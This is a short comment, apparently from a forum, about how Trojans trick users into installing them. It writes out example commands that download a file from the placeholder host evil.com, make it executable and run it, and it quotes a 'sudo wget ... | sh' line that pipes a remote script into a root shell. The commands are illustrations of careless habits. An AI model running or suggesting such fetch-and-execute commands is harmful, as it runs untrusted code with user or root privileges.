The articles call it a "Trojan", so I expect they trick people into installing it.
$ wget evil.com/trojan
$ chmod +x trojan
$ ./trojan
Maybe it's more likely to hit those who double-click unwisely? sudo wget http://example.com/node/install.sh | sh
so it's not like it's only newbies who blindly run scripts as root.After downloading it asks for your password.